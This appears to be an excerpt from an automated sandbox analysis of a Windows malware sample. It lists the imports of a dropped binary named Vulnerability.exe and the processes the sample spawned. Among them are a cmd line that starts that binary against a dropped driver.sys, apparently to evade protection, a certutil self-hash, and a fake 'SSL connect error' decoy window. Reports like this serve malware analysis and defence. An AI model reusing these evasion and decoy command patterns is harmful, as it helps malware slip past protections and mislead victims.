Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F14C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle, 5_2_00007FF7738F14C0
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F1630 SetUnhandledExceptionFilter,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,__std_fs_code_page,memcmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 5_2_00007FF7738F1630
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F4D00 SetUnhandledExceptionFilter, 5_2_00007FF7738F4D00
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F43B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00007FF7738F43B8
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F4B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00007FF7738F4B58

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Iyto7FYCJO.exe NtProtectVirtualMemory: Indirect: 0x7FF7A2B8EF62
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
Source: C:\Users\user\Desktop\Iyto7FYCJO.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driver.sys
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\Iyto7FYCJO.exe" MD5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "md5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "certutil"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Windows\Vulnerability.exe Code function: GetLocaleInfoEx,FormatMessageA, 5_2_00007FF7738F38A8
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Vulnerability.exe Code function: 5_2_00007FF7738F4D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_00007FF7738F4D6C